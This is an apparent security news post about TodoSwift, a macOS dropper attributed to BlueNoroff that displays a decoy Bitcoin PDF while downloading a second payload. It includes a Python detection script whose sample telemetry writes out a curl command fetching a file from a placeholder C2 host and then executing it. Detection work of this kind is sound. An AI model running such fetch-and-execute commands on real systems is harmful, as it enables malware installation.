TodoSwift malware targets macOS disguised as Bitcoin PDF app

Meet TodoSwift, a malicious application that disguises itself as a PDF downloader. Developed by the BlueNoroff threat group, TodoSwift leverages Apple’s Swift/SwiftUI to display a mock PDF about Bitcoin while secretly downloading a malicious payload. Don’t be fooled! Stay updated on this sophisticated malware.

New malware has been discovered targeting macOS users, this time disguised as a seemingly harmless downloadable Bitcoin PDF. Researchers at Kandji identified the malware and named it TodoSwift because it is written in Swift/SwiftUI.

Kandji’s report shows that the malware is hidden in a file called “TodoTasks” that was uploaded to VirusTotal on July 24, 2024.

Further investigation revealed that TodoTasks uses a GUI application written in Swift/SwiftUI to disguise its malicious intent. The application presents itself as a tool for downloading and viewing PDFs. However, beneath the surface, TodoTasks has a more nefarious purpose.

In reality, the malware secretly downloads and executes a secondary malicious program. This two-step approach makes detection more difficult because the original application can appear legitimate.

The chain starts when the application creates a window controller object through the makeWindowControllers method, which is where the malicious behavior is triggered. The dropper then calls a PDF presentation function that retrieves two URLs from memory: one points to a Google Drive link and the other is presumably malicious.

The buildCurlCommand function uses callToCurl to download the first item, a PDF named “Bitcoin Price Prediction Using Machine Learning”. The PDF looks harmless and serves only as a decoy to distract the user. After displaying it, buildCurlCommand runs a second curl command, which likely downloads the malicious payload from the second URL.
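As an added detection example (not code from Kandji's report or from the malware), the script below models the chain just described, a GUI app bundle binary spawning curl for a decoy PDF, then a second curl, then executing the fetched file, and flags it in constructed process telemetry. The event layout, file paths and URLs are assumptions and placeholders, not real indicators.

```python
import shlex
from collections import defaultdict

# Constructed sample process telemetry (not real IoCs): (pid, ppid, image, cmdline).
# The first five events mimic the TodoSwift dropper chain; the last two are a benign
# browser download used as a negative case.
EVENTS = [
    (100, 1,   "/Applications/TodoTasks.app/Contents/MacOS/TodoTasks", "TodoTasks"),
    (101, 100, "/usr/bin/curl", "curl -L -o /tmp/Bitcoin_Price_Prediction.pdf https://drive.google.com/uc?id=PLACEHOLDER_ID"),
    (102, 100, "/usr/bin/open", "open /tmp/Bitcoin_Price_Prediction.pdf"),
    (103, 100, "/usr/bin/curl", "curl -s -o /tmp/.update https://c2.example.invalid/PLACEHOLDER"),
    (104, 100, "/tmp/.update", "/tmp/.update"),
    (200, 1,   "/Applications/Safari.app/Contents/MacOS/Safari", "Safari"),
    (201, 200, "/usr/bin/curl", "curl -O https://files.example.invalid/report.pdf"),
]

def curl_output_path(cmdline):
    """Return the file that a curl command writes via -o/--output, or None."""
    argv = shlex.split(cmdline)
    for i, tok in enumerate(argv[:-1]):
        if tok in ("-o", "--output"):
            return argv[i + 1]
    return None

def find_dropper_chains(events):
    """Flag a parent that (1) runs from an .app bundle, (2) spawns curl at least
    twice, and (3) executes a file that one of those curl commands wrote."""
    by_parent = defaultdict(list)
    for pid, ppid, image, cmdline in events:
        by_parent[ppid].append((pid, image, cmdline))
    findings = []
    for ppid, children in by_parent.items():
        parent = next((e for e in events if e[0] == ppid), None)
        if parent is None or ".app/Contents/MacOS/" not in parent[2]:
            continue
        curls = [c for c in children if c[1].endswith("/curl")]
        if len(curls) < 2:
            continue
        written = {curl_output_path(c[2]) for c in curls} - {None}
        executed = [c[1] for c in children if c[1] in written]
        if executed:
            findings.append({"parent": parent[2], "curl_count": len(curls),
                             "executed": executed})
    return findings

if __name__ == "__main__":
    for hit in find_dropper_chains(EVENTS):
        print("suspicious dropper chain:", hit)
```

Real endpoint telemetry carries richer fields (code-signing state, file-write events), so treat this as the shape of the rule rather than a drop-in signature.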

Researchers have attributed the malware to the North Korean threat actor group BlueNoroff due to similarities to previously observed malware KandyKorn and RustBucket.

BlueNoroff is a subgroup of the larger North Korean state-backed group Lazarus and is known for persistently targeting financial institutions, cryptocurrency exchanges, and government entities. Recently, BlueNoroff has demonstrated a sophisticated ability to evade detection and carry out complex cyberattacks.

In 2019, the U.S. Treasury Department imposed sanctions on three North Korean cyber groups – Lazarus, BlueNoroff and Andariel – for their cyber activities against critical infrastructure and alleged that they supported illegal weapons and missile programs. However, the group remains a persistent threat.

If you suspect that you have downloaded TodoSwift or similar malware, we recommend that you run a comprehensive security scan on your device using a reputable antivirus program. Also, remember to stay updated and practice safe browsing habits.


By Bronte
